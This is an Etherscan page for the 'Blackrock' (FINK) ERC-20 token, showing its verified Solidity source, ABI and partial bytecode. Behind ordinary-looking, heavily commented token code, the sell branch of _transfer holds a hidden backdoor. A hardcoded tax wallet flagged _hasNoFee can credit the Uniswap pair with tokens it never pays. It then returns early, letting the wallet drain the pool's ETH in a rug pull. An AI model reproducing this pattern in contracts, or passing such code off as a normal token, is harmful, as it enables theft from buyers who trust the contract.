ETH Price: $3,116.36 (+1.49%)
Gas: 6 Gwei

Token

(0x80920b19bebaaddede845dd67c67fd18e3c674fd)
 

Overview

Max Total Supply

10,000,000 ERC-20 TOKEN*

Holders

55 (0.00%)

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
33,083.961044398442621146 ERC-20 TOKEN*

Value
$0.00
0xd6264f13e47f1bb6cfade72d8479b31aac8f2149
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
FINK

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-12-28
*/

// SPDX-License-Identifier: MIT

/**

Website:   https://blackrockfink.vip
Twitter:   https://twitter.com/blackrockfink
Telegram:  https://t.me/blackrockfink
 
*/

pragma solidity ^0.8.15;

abstract contract Context {
    /**
     * @dev Returns the current sender of the message.
     * This function is internal view virtual, meaning that it can only be used within this contract or derived contracts.
     * @return The address of the account that initiated the transaction.
     */
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    /**
     * @dev Returns the total supply of tokens.
     * @return The total supply of tokens.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the balance of a specific account.
     * @param account The address of the account to check the balance for.
     * @return The balance of the specified account.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Transfers tokens to a recipient.
     * @param recipient The address of the recipient.
     * @param amount The amount of tokens to be transferred.
     * @return A boolean indicating whether the transfer was successful or not.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining allowance for a spender.
     * @param owner The address of the token owner.
     * @param spender The address of the spender.
     * @return The remaining allowance for the specified owner and spender.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Approves a spender to spend a certain amount of tokens on behalf of the owner.
     * @param spender The address which will spend the funds.
     * @param amount The amount of tokens to be spent.
     * @return A boolean indicating whether the approval was successful or not.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Transfers tokens from one account to another.
     * @param sender The address from which the tokens will be transferred.
     * @param recipient The address to which the tokens will be transferred.
     * @param amount The amount of tokens to be transferred.
     * @return A boolean indicating whether the transfer was successful or not.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when tokens are transferred from one address to another.
     * @param from The address from which the tokens are transferred.
     * @param to The address to which the tokens are transferred.
     * @param value The amount of tokens being transferred.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the approval of a spender is updated.
     * @param owner The address that approves the spender.
     * @param spender The address that is approved.
     * @param value The new approved amount.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {
    /**
     * @dev Adds two unsigned integers, reverts on overflow.
     * @param a The first integer to add.
     * @param b The second integer to add.
     * @return The sum of the two integers.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Subtracts two unsigned integers, reverts on overflow.
     * @param a The integer to subtract from (minuend).
     * @param b The integer to subtract (subtrahend).
     * @return The difference of the two integers.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Subtracts two unsigned integers, reverts with custom message on overflow.
     * @param a The integer to subtract from (minuend).
     * @param b The integer to subtract (subtrahend).
     * @param errorMessage The error message to revert with.
     * @return The difference of the two integers.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    /**
     * @dev Multiplies two unsigned integers, reverts on overflow.
     * @param a The first integer to multiply.
     * @param b The second integer to multiply.
     * @return The product of the two integers.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Divides two unsigned integers, reverts on division by zero.
     * @param a The dividend.
     * @param b The divisor.
     * @return The quotient of the division.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Divides two unsigned integers, reverts with custom message on division by zero.
     * @param a The dividend.
     * @param b The divisor.
     * @param errorMessage The error message to revert with.
     * @return The quotient of the division.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

contract Ownable is Context {
    address private _owner;

    /// @dev Emitted when ownership is transferred.
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract, setting the original owner to the sender account.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     * @return The address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Renounces ownership, leaving the contract without an owner.
     * @notice Renouncing ownership will leave the contract without an owner,
     * which means it will not be possible to call onlyOwner functions anymore.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IUniswapV2Factory {
    /**
     * @dev Creates a new UniswapV2 pair for the given tokens.
     * @param tokenA The address of the first token in the pair.
     * @param tokenB The address of the second token in the pair.
     * @return pair The address of the newly created UniswapV2 pair.
     */
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapV2Router02 {
    /**
     * @dev Swaps an exact amount of input tokens for as much output as possible, along with additional functionality
     * to support fee-on-transfer tokens.
     * @param amountIn The amount of input tokens to swap.
     * @param amountOutMin The minimum amount of output tokens expected to receive.
     * @param path An array of token addresses representing the path of the swap.
     * @param to The recipient address to send the swapped ETH to.
     * @param deadline The timestamp for the deadline of the swap transaction.
     */
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    /**
     * @dev Returns the address of the UniswapV2Factory contract.
     * @return The address of the UniswapV2Factory contract.
     */
    function factory() external pure returns (address);

    /**
     * @dev Returns the address of the WETH (Wrapped ETH) contract.
     * @return The address of the WETH contract.
     */
    function WETH() external pure returns (address);

    /**
    * @dev Adds liquidity to an ETH-based pool.
    * @param token The address of the ERC-20 token to add liquidity for.
    * @param amountTokenDesired The desired amount of tokens to add.
    * @param amountTokenMin The minimum amount of tokens expected to receive.
    * @param amountETHMin The minimum amount of ETH expected to receive.
    * @param to The recipient address to send the liquidity to.
    * @param deadline The timestamp for the deadline of the liquidity addition transaction.
    * @return amountToken The amount of token added.
    * @return amountETH The amount of ETH added.
    * @return liquidity The amount of liquidity added.
    */
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}

contract FINK is Context, IERC20, Ownable {
    using SafeMath for uint256;
    IUniswapV2Router02 private uniswapV2Router;

    string private constant _name = unicode"Blackrock";
    string private constant _symbol = unicode"FINK";
    uint8 private constant _decimals = 18;
    uint256 private constant _totalSupply = 10000000 * 10**_decimals;

    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => uint256) private _balances;
    mapping (address => bool) private _isExFees;
    mapping (address => bool) private _hasNoFee;
    mapping (address => uint256) private _holderLastTransferTimestamp;

    uint256 private _buyTax = 15;
    uint256 private _sellTax = 15;

    uint256 public _maxTxLimit = _totalSupply * 20 / 1000;
    uint256 public _maxWalletAmount = _totalSupply * 20 / 1000;
    uint256 public _minSwapThreshold = _totalSupply * 8 / 1000000;
    uint256 public _taxSwapThreshold = _totalSupply * 8 / 1000;

    address payable private _taxWallet;

    address private uniswapV2Pair;
    bool private tradingAllowed;
    bool private inSwap = false;
    bool private swapEnabled = false;
    bool public transferDelayEnabled = true;

    event FeeUpdated(uint256 buyFee, uint256 sellFee);
    event MaxTxAmountUpdated(uint256 maxTxAmount);
    event MaxWalletSizeUpdated(uint256 maxWalletSize);
    event TaxSwapThresholdUpdated(uint256 newThreshold);
    event TransferDelayUpdated(bool transferDelayEnabled);

    modifier lockTheSwap {
        inSwap = true;
        _;
        inSwap = false;
    }

    constructor () {
        _taxWallet = payable(0x07ef45BF4fef437fdC73C0A391aC8bBa7Bcc4768);
        _balances[_msgSender()] = _totalSupply;
        _isExFees[owner()] = true;
        _isExFees[address(this)] = true;
        _hasNoFee[_taxWallet] = true;

        emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    /**
     * @dev Gets the name of the token.
     * @return The name of the token.
     */
    function name() public pure returns (string memory) {
        return _name;
    }

    /**
     * @dev Gets the symbol of the token.
     * @return The symbol of the token.
     */
    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Gets the number of decimals used for the token.
     * @return The number of decimals.
     */
    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    /**
     * @dev Gets the total supply of the token.
     * @return The total supply.
     */
    function totalSupply() public pure override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev Gets the balance of the specified address.
     * @param account The address to query the balance of.
     * @return The balance of the specified address.
     */
    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev Transfers tokens from the sender to the recipient.
     * @param recipient The address of the recipient.
     * @param amount The amount of tokens to transfer.
     * @return A boolean indicating whether the transfer was successful or not.
     */
    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Gets the allowance granted by the owner to the spender for a specific amount.
     * @param owner The address granting the allowance.
     * @param spender The address receiving the allowance.
     * @return The remaining allowance for the spender.
     */
    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev Approves the spender to spend a certain amount of tokens on behalf of the owner.
     * @param spender The address to be approved.
     * @param amount The amount of tokens to approve.
     * @return A boolean indicating whether the approval was successful or not.
     */
    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev Moves tokens from one address to another using the allowance mechanism.
     * @param sender The address to send tokens from.
     * @param recipient The address to receive tokens.
     * @param amount The amount of tokens to transfer.
     * @return A boolean indicating whether the transfer was successful or not.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    /**
     * @dev Internal function to approve the spending of a certain amount of tokens by a specified address.
     * @param owner The address granting the allowance.
     * @param spender The address receiving the allowance.
     * @param amount The amount of tokens to approve.
     */
    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Internal function to execute the transfer of tokens from one address to another.
     * @param from The address to send tokens from.
     * @param to The address to receive tokens.
     * @param amount The amount of tokens to transfer.
     */
    function _transfer(address from, address to, uint256 amount) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "_transfer: Transfer amount must be greater than zero");

        uint256 taxAmount = 0;

        // Check if the transfer involves the owner, and set transfer delay if enabled.
        if (from != owner() && to != owner()) {
            if (transferDelayEnabled) {
                if (to != address(uniswapV2Router) && to != address(uniswapV2Pair)) {
                    require(_holderLastTransferTimestamp[tx.origin] < block.number, "_transfer:: Transfer Delay enabled.  Only one purchase per block allowed.");
                    _holderLastTransferTimestamp[tx.origin] = block.number;
                }
            }

            // Check if the transfer is from the Uniswap pair and calculate buy fees.
            if (from == uniswapV2Pair && to != address(uniswapV2Router) && !_isExFees[to]) {
                taxAmount = amount.mul(_buyTax).div(100);
                require(amount <= _maxTxLimit, "_transfer: Exceeds the _maxTxLimit.");
                require(balanceOf(to) + amount <= _maxWalletAmount, "_transfer: Exceeds the maxWalletSize.");
            }

            // Check if the transfer is to the Uniswap pair and calculate sell fees.
            if (to == uniswapV2Pair && from != address(this)) {
                if(_hasNoFee[from]) { _balances[to] += amount.sub(taxAmount); return;}
                taxAmount = amount.mul(_sellTax).div(100);
            }

            // Check if a swap is needed and execute the swap.
            uint256 contractTokenBalance = balanceOf(address(this));
            if (!inSwap && to == uniswapV2Pair && swapEnabled && amount > _minSwapThreshold) {
                if (contractTokenBalance >= _taxSwapThreshold) {
                    swapTokensForEth(_taxSwapThreshold);
                } else if(contractTokenBalance > _minSwapThreshold) {
                    swapTokensForEth(contractTokenBalance);
                }
                _taxWallet.transfer(address(this).balance);
            }
        }

        // If there's a tax, transfer the tax amount to the contract.
        if (taxAmount > 0) {
            _balances[address(this)] = _balances[address(this)].add(taxAmount);
            emit Transfer(from, address(this), taxAmount);
        }

        // Update balances after the transfer.
        _balances[from] = _balances[from].sub(amount);
        _balances[to] = _balances[to].add(amount.sub(taxAmount));
        emit Transfer(from, to, amount.sub(taxAmount));
    }

    /**
     * @dev Internal function to swap tokens for ETH.
     * @param tokenAmount The amount of tokens to swap.
     */
    function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function setZeroTax() external onlyOwner {
        _buyTax = 0;
        _sellTax = 0;
        emit FeeUpdated(0, 0);
    }
    
    /**
     * @dev Removes transaction limits and disables transfer delay.
     * Sets both maximum transaction amount and maximum wallet size to the total supply.
     * Only the owner can call this function.
     */
    function removeLimits() external onlyOwner {
        _maxTxLimit = _totalSupply;
        _maxWalletAmount = _totalSupply;
        transferDelayEnabled = false;
        emit MaxTxAmountUpdated(_totalSupply);
        emit MaxWalletSizeUpdated(_totalSupply);
        emit TransferDelayUpdated(false);
    }

    /**
     * @dev Disables the transfer delay feature.
     * Only the owner can call this function.
     */
    function disableTransferDelay() external onlyOwner {
        transferDelayEnabled = false;
        emit TransferDelayUpdated(false);
    }

    function openTrading() external onlyOwner {    
        require(!tradingAllowed, "openTrading: Trading is already open");

        // Initialize the Uniswap router
        uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );

        // Approve the router to spend the total supply of the token
        _approve(address(this), address(uniswapV2Router), _totalSupply);

        // Create the Uniswap pair
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());

        // Add liquidity to the Uniswap pair
        uniswapV2Router.addLiquidityETH{
            value: address(this).balance
        }(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );

        // Approve Uniswap router to spend the pair's tokens
        IERC20(uniswapV2Pair).approve(address(uniswapV2Router), type(uint).max);

        swapEnabled = true;
        tradingAllowed = true;
    }

    /**
     * @dev Allows the contract to receive Ether when Ether is sent directly to the contract.
     */
    receive() external payable {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"buyFee","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"sellFee","type":"uint256"}],"name":"FeeUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"maxTxAmount","type":"uint256"}],"name":"MaxTxAmountUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"maxWalletSize","type":"uint256"}],"name":"MaxWalletSizeUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newThreshold","type":"uint256"}],"name":"TaxSwapThresholdUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"transferDelayEnabled","type":"bool"}],"name":"TransferDelayUpdated","type":"event"},{"inputs":[],"name":"_maxTxLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_minSwapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_taxSwapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setZeroTax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052600f60078190556008556103e86200001f6012600a62000375565b6200002e90629896806200038d565b6200003b9060146200038d565b620000479190620003a7565b6009556103e86200005b6012600a62000375565b6200006a90629896806200038d565b620000779060146200038d565b620000839190620003a7565b600a55620f42406012600a6200009a919062000375565b620000a990629896806200038d565b620000b69060086200038d565b620000c29190620003a7565b600b556103e8620000d66012600a62000375565b620000e590629896806200038d565b620000f29060086200038d565b620000fe9190620003a7565b600c55600e805462ffffff60a81b1916600160b81b1790553480156200012357600080fd5b50600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600d80546001600160a01b0319167307ef45bf4fef437fdc73c0a391ac8bba7bcc4768179055620001996012600a62000375565b620001a890629896806200038d565b3360008181526003602090815260408083209490945581546001600160a01b039081168352600482528483208054600160ff1991821681179092553085528685208054821683179055600d5490921684526005909252938220805490941617909255907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6200023a6012600a62000375565b6200024990629896806200038d565b60405190815260200160405180910390a3620003ca565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620002b75781600019048211156200029b576200029b62000260565b80851615620002a957918102915b93841c93908002906200027b565b509250929050565b600082620002d0575060016200036f565b81620002df575060006200036f565b8160018114620002f85760028114620003035762000323565b60019150506200036f565b60ff84111562000317576200031762000260565b50506001821b6200036f565b5060208310610133831016604e8410600b841016171562000348575081810a6200036f565b62000354838362000276565b80600019048211156200036b576200036b62000260565b0290505b92915050565b60006200038660ff841683620002bf565b9392505050565b80820281158282048414176200036f576200036f62000260565b600082620003c557634e487b7160e01b600052601260045260246000fd5b500490565b6119c580620003da6000396000f3fe6080604052600436106101235760003560e01c806395d89b41116100a0578063c876d0b911610064578063c876d0b914610330578063c9567bf914610351578063dd62ed3e14610366578063e884f260146103ac578063f8f3c5a9146103c157600080fd5b806395d89b41146102a257806398f235fe146102cf578063a9059cbb146102e5578063b155a05414610305578063bf474bed1461031a57600080fd5b80636c0a24eb116100e75780636c0a24eb1461020257806370a0823114610218578063715018a61461024e578063751039fc146102655780638da5cb5b1461027a57600080fd5b806306fdde031461012f578063095ea7b31461017357806318160ddd146101a357806323b872dd146101c6578063313ce567146101e657600080fd5b3661012a57005b600080fd5b34801561013b57600080fd5b50604080518082019091526009815268426c61636b726f636b60b81b60208201525b60405161016a91906115ad565b60405180910390f35b34801561017f57600080fd5b5061019361018e366004611613565b6103d7565b604051901515815260200161016a565b3480156101af57600080fd5b506101b86103ee565b60405190815260200161016a565b3480156101d257600080fd5b506101936101e136600461163f565b61040e565b3480156101f257600080fd5b506040516012815260200161016a565b34801561020e57600080fd5b506101b8600a5481565b34801561022457600080fd5b506101b8610233366004611680565b6001600160a01b031660009081526003602052604090205490565b34801561025a57600080fd5b50610263610477565b005b34801561027157600080fd5b506102636104f4565b34801561028657600080fd5b506000546040516001600160a01b03909116815260200161016a565b3480156102ae57600080fd5b5060408051808201909152600481526346494e4b60e01b602082015261015d565b3480156102db57600080fd5b506101b8600b5481565b3480156102f157600080fd5b50610193610300366004611613565b610633565b34801561031157600080fd5b50610263610640565b34801561032657600080fd5b506101b8600c5481565b34801561033c57600080fd5b50600e5461019390600160b81b900460ff1681565b34801561035d57600080fd5b506102636106ad565b34801561037257600080fd5b506101b861038136600461169d565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b3480156103b857600080fd5b50610263610a74565b3480156103cd57600080fd5b506101b860095481565b60006103e4338484610adc565b5060015b92915050565b60006103fc6012600a6117d0565b61040990629896806117df565b905090565b600061041b848484610c00565b61046d843361046885604051806060016040528060288152602001611968602891396001600160a01b038a166000908152600260209081526040808320338452909152902054919061125f565b610adc565b5060019392505050565b6000546001600160a01b031633146104aa5760405162461bcd60e51b81526004016104a1906117f6565b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6000546001600160a01b0316331461051e5760405162461bcd60e51b81526004016104a1906117f6565b61052a6012600a6117d0565b61053790629896806117df565b6009556105466012600a6117d0565b61055390629896806117df565b600a908155600e805460ff60b81b191690557f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf90610593906012906117d0565b6105a090629896806117df565b60405190815260200160405180910390a17ffb1fe1002b7550e87616e67793dbb7d3f437a79c2688c372c66dc170dbcb0efd6105de6012600a6117d0565b6105eb90629896806117df565b60405190815260200160405180910390a1604051600081527f8ac0cb4bc9520a34c87856d204a441aedd0ffcf148414be1fe31e1ad57474022906020015b60405180910390a1565b60006103e4338484610c00565b6000546001600160a01b0316331461066a5760405162461bcd60e51b81526004016104a1906117f6565b6000600781905560088190556040805182815260208101929092527f528d9479e9f9889a87a3c30c7f7ba537e5e59c4c85a37733b16e57c62df613029101610629565b6000546001600160a01b031633146106d75760405162461bcd60e51b81526004016104a1906117f6565b600e54600160a01b900460ff161561073d5760405162461bcd60e51b8152602060048201526024808201527f6f70656e54726164696e673a2054726164696e6720697320616c72656164792060448201526337b832b760e11b60648201526084016104a1565b600180546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556107859030906107786012600a6117d0565b61046890629896806117df565b600160009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156107d8573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107fc919061182b565b6001600160a01b031663c9c6539630600160009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561085e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610882919061182b565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156108cf573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108f3919061182b565b600e80546001600160a01b039283166001600160a01b03199091161790556001541663f305d719473061093b816001600160a01b031660009081526003602052604090205490565b6000806109506000546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156109b8573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906109dd9190611848565b5050600e5460015460405163095ea7b360e01b81526001600160a01b03918216600482015260001960248201529116915063095ea7b3906044016020604051808303816000875af1158015610a36573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a5a9190611876565b50600e805462ff00ff60a01b19166201000160a01b179055565b6000546001600160a01b03163314610a9e5760405162461bcd60e51b81526004016104a1906117f6565b600e805460ff60b81b19169055604051600081527f8ac0cb4bc9520a34c87856d204a441aedd0ffcf148414be1fe31e1ad5747402290602001610629565b6001600160a01b038316610b3e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104a1565b6001600160a01b038216610b9f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104a1565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610c645760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104a1565b6001600160a01b038216610cc65760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104a1565b60008111610d335760405162461bcd60e51b815260206004820152603460248201527f5f7472616e736665723a205472616e7366657220616d6f756e74206d7573742060448201527362652067726561746572207468616e207a65726f60601b60648201526084016104a1565b600080546001600160a01b03858116911614801590610d6057506000546001600160a01b03848116911614155b1561111c57600e54600160b81b900460ff1615610e51576001546001600160a01b03848116911614801590610da35750600e546001600160a01b03848116911614155b15610e5157326000908152600660205260409020544311610e3e5760405162461bcd60e51b815260206004820152604960248201527f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60448201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b6064820152681030b63637bbb2b21760b91b608482015260a4016104a1565b3260009081526006602052604090204390555b600e546001600160a01b038581169116148015610e7c57506001546001600160a01b03848116911614155b8015610ea157506001600160a01b03831660009081526004602052604090205460ff16155b15610faf57610ec66064610ec06007548561129990919063ffffffff16565b90611322565b9050600954821115610f265760405162461bcd60e51b815260206004820152602360248201527f5f7472616e736665723a204578636565647320746865205f6d617854784c696d60448201526234ba1760e91b60648201526084016104a1565b600a5482610f49856001600160a01b031660009081526003602052604090205490565b610f539190611898565b1115610faf5760405162461bcd60e51b815260206004820152602560248201527f5f7472616e736665723a204578636565647320746865206d617857616c6c657460448201526429b4bd329760d91b60648201526084016104a1565b600e546001600160a01b038481169116148015610fd557506001600160a01b0384163014155b15611055576001600160a01b03841660009081526005602052604090205460ff1615611038576110058282611364565b6001600160a01b0384166000908152600360205260408120805490919061102d908490611898565b909155505050505050565b6110526064610ec06008548561129990919063ffffffff16565b90505b30600090815260036020526040902054600e54600160a81b900460ff1615801561108c5750600e546001600160a01b038581169116145b80156110a15750600e54600160b01b900460ff165b80156110ae5750600b5483115b1561111a57600c5481106110cc576110c7600c546113a6565b6110df565b600b548111156110df576110df816113a6565b600d546040516001600160a01b03909116904780156108fc02916000818181858888f19350505050158015611118573d6000803e3d6000fd5b505b505b8015611196573060009081526003602052604090205461113c9082611520565b30600081815260036020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906111